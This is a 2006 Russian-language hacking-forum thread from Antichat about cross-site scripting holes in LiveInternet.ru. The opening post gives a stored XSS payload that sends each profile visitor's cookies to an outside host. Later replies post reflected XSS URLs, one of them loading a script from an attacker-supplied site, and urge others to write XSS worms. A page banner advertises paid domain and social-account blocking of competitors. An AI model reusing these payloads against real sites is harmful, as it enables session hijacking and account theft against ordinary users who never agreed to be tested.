Форум АНТИЧАТ - XSS в дневнике LiveInternet.ru

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
XSS в дневнике LiveInternet.ru

Страница 1 из 3

Опции темы

Поиск в этой теме

Опции просмотра

XSS в дневнике LiveInternet.ru

13.12.2006, 12:10

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

Провел на форуме:
6860213

Репутация: 378

XSS в дневнике LiveInternet.ru

Вот нашол активную xss:
когда регимся, вводим в поле "О новом дневнике - в двух словах"

Код:

<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

.
потом все кто помотрит ваш профиль отдаст куки...
Примеры:
http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
http://www.liveinternet.ru/users/nokia1/profile/ - алерт.

13.12.2006, 19:30

-FARAON2005RAMSES-

Познающий

Регистрация: 06.10.2006

Сообщений: 59

Провел на форуме:
148279

Репутация: 9

Отправить сообщение для -FARAON2005RAMSES- с помощью ICQ

Отправить сообщение для -FARAON2005RAMSES- с помощью MSN

О! санкс! всё пашет!

13.12.2006, 19:34

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

Провел на форуме:
11338585

Репутация: 441

Отправить сообщение для DimOnOID с помощью ICQ

да..+ тебе )))
хотя уже пол года назад знал.....там ваще админы тупят...

14.12.2006, 19:23

slider

Members of Antichat - Level 5

Регистрация: 04.09.2005

Сообщений: 528

Провел на форуме:
6520559

Репутация: 2947

http://www.liveinternet.ru/journal_register.php
Поле:*Подтвердить пароль:
не фильтруется!

14.12.2006, 20:06

†Romi4†

Постоянный

Регистрация: 06.02.2006

Сообщений: 409

Провел на форуме:
1686680

Репутация: 555

)) прикольно,лови +

15.12.2006, 02:54

~~Petr~~

Banned

Регистрация: 10.06.2006

Сообщений: 938

Провел на форуме:
7792614

Репутация: 1223

Туплю, не нашел этот пункт

Именно где он? Я по новой не регился, я именно хотел бы узнать где он в настройках, + у других в пофиле такого тоже не увидел, Черт не дружу я с таких типов сайтами

Последний раз редактировалось Sandjuro; 15.12.2006 в 02:56..

22.12.2006, 16:50

-FARAON2005RAMSES-

Познающий

Регистрация: 06.10.2006

Сообщений: 59

Провел на форуме:
148279

Репутация: 9

именно поэтому ты и не нашёл этот пунктик.
Надо региться заного, тогда найдёшь.

22.12.2006, 19:20

Zadoxlik

Постоянный

Регистрация: 28.02.2005

Сообщений: 853

Провел на форуме:
3369632

Репутация: 749

Пишите Xss вирус =) Мой для ливжурнала помог пользователям получить красивые доменчики третего уровня для своих ЖЖ =)

22.12.2006, 20:37

*D1VER

Участник форума

Регистрация: 05.12.2006

Сообщений: 112

Провел на форуме:
685950

Репутация: 175

Отправить сообщение для *D1VER с помощью ICQ

http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorde r=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0

Пассивная ХSS почти там же!

#10

28.12.2006, 12:52

ReanimatoR

Участник форума

Регистрация: 27.08.2006

Сообщений: 223

Провел на форуме:
2154209

Репутация: 341

Отправить сообщение для ReanimatoR с помощью ICQ

PASSIVE XSS при реге счетчиков
http://www.liveinternet.ru/add/add/?rules=agreed&www=&type=site&random=1113854391&url =http%3A%2F%2Flalala.2u2r%2F&aliases=&name="><scri pt src=http://ТВОЙСАЙТ.ru/js.js></script>&email=123%40123.123&password=mikmik&check= mikmik&keywords=&private=&subscribe=on&group=ru&gr oup=ru%2Fauto&ok=+%E4%E0%EB%FC%F8%E5+%3E%3E+

Страница 1 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Энциклопедия уязвимых скриптов	DIAgen	Сценарии/CMF/СMS	401	17.06.2010 17:39
IE XSS Kit	.Slip	Чаты	22	23.10.2006 06:45
XSS worms	Xex	Статьи	0	02.10.2006 01:49
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход